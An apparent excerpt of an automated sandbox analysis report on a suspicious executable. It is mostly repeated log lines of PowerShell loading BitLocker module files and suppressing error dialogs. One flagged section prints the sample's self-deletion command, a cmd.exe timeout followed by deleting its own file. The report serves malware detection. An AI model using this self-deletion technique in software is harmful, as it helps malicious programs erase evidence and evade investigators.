    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Self deletion via cmd or bat file
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeProcess created: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\dYUteuvmHn.exe"
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeProcess created: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\dYUteuvmHn.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
